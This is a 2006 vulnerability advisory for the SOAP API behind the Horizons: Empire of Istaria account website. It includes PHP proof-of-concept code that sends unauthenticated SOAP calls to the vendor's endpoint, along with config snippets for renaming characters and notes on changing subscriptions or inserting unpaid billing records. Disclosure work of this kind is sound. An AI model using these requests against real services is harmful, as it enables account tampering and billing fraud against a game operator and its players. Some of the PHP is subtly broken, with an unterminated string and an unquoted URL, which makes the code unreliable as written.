Advisory Name: Horizons: Empire of Istaria SOAP Vulnerability
Release Date: 2006-08-24
Affected Applications: Horizons Account Website / SOAP API
Affected Platforms: Horizons NA-Servers (Horizons Europe is not affected)
Local / Remote: Remote
Severity: High
Author: Bernd Kilga <frame@console.cc>
Vendor Status: Notified. No patch available.

Copyright 2006 Console++


Overview:

Horizons uses a SOAP API to interchange data/commands between the Application
Server and several Clients. The API doesn't verify the source which does
trigger functions, which opens up multiple abuse possibilities.

A vulnerability has been discovered in the Horizons SOAP API that allows an
attacker to modify account and character information such as:

- change payment and subscription information
- create bogus/non-charged/unverified billings
- rename characters
- retrieve sensitive server/shard information
- activate/ban the account
- change account status like trial,
- add promotions (free, military, other promotions etc.)
- change/add keys



Vulnerability Example (standalone, noncritical):

<?php

	$contents = '
	<soap:Envelope
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xmlns:xsd="http://www.w3.org/2001/XMLSchema"
	xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
		<soap:Body>
			<hsp_getCurrentShardCapacity_All
xmlns="https://horizons.istaria.com/DataAccess/">
			<userKeyID>%session_key%</userKeyID>
			</hsp_getCurrentShardCapacity_All>
		</soap:Body>
	</soap:Envelope>';

	$header = array();
	$header[] = 'POST /DataAccess/dataAccessLayerWS.asmx HTTP/1.1';
	$header[] = 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 1.1.4322.2032)';
	$header[] = 'Content-Type: text/xml; charset=utf-8';
	$header[] = 'SOAPAction: "https://horizons.istaria.com/DataAccess/hsp_getCurrentShardCapacity_All"';
	$header[] = 'Content-length: ' . strlen($contents) . ';
	$header[] = 'Expect: 100-continue';
	$header[] = 'Host: horizons.istaria.com';
	
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
	curl_setopt($ch, CURLOPT_VERBOSE, '1');
	curl_setopt($ch, CURLOPT_URL, http://horizons.istaria.com/DataAccess/dataAccessLayerWS.asmx);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_TIMEOUT, 4);
	curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
	curl_setopt($ch, CURLOPT_POST, 1);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $contents);
	
	echo curl_exec($ch);
?>

This example returns the current shard status.
%session_key% is a valid SOAP session-key, such as generated from
HorizonsLauncher.exe

SOAPAction: hsp_getCurrentShardCapacity_All is an example. any command listed at
http://horizons.istaria.com/DataAccess/dataAccessLayerWS.asmx?WSDL will work,
except those protected by 'serverPW'. The contents of the above URL has been
dumped into hzh.xml for better performance.

The enclosed php files allow to execute any command with any possible parameter.

Example: Rename your Character.

<?php
	//hzh.php, line 70+
	
	$hzh->config['action'] = 'hsp_UpdateCharacterName';
	
	$hzh->config['user']['_shardID'] = '1';
	$hzh->config['user']['_bioteID'] = '123456';
	$hzh->config['user']['FirstName'] = 'My_new_firstname';
	$hzh->config['user']['LastName'] = 'My_new_lastname';
?>

This adjustment will rename the character matching the biote 123456 (and also
matching the specified username and password)

Other possible scenario involving a couple of lines allows to change the duration
of the current subscription or add a billing entry normally returned from online
payment.

<?php
	//hzh.php, line 50

	$hzh->config['user'] = Array
	(
		'userKeyID' => '',
		'userID' => '',
		'accountID' => '',
		'userName' => '',
		'password' => '',
	);
?>

This code bit represents the basic configuration required to allow SOAP
interaction.

UserID and accountID can be retrieved from http interception when using
HorizonsLauncher.exe



Vulnerability limitations:

*Without* the knowledge of 'ServerPW' it's not possible to alter any data outside an
existing Horizons Account.



Vendor Response:

2006-08-24 - Vendor Notified.
2006-08-27 - Confirmation received from vendor (no fix yet)



Contact Information:

For more information regarding the vulnerability feel free to contact the author at
frame@console.cc

For more information regaring Console++: http://72dpi.console.cc/

The PHP Application Framework ($coma class) used to create the example application
is proprietary software and may not be redistributed or changed otherwise.
The Example Application ($hzh class) is under no license.

For more information regarding Coma: http://coma.console.cc/


Copyright 2006 Console++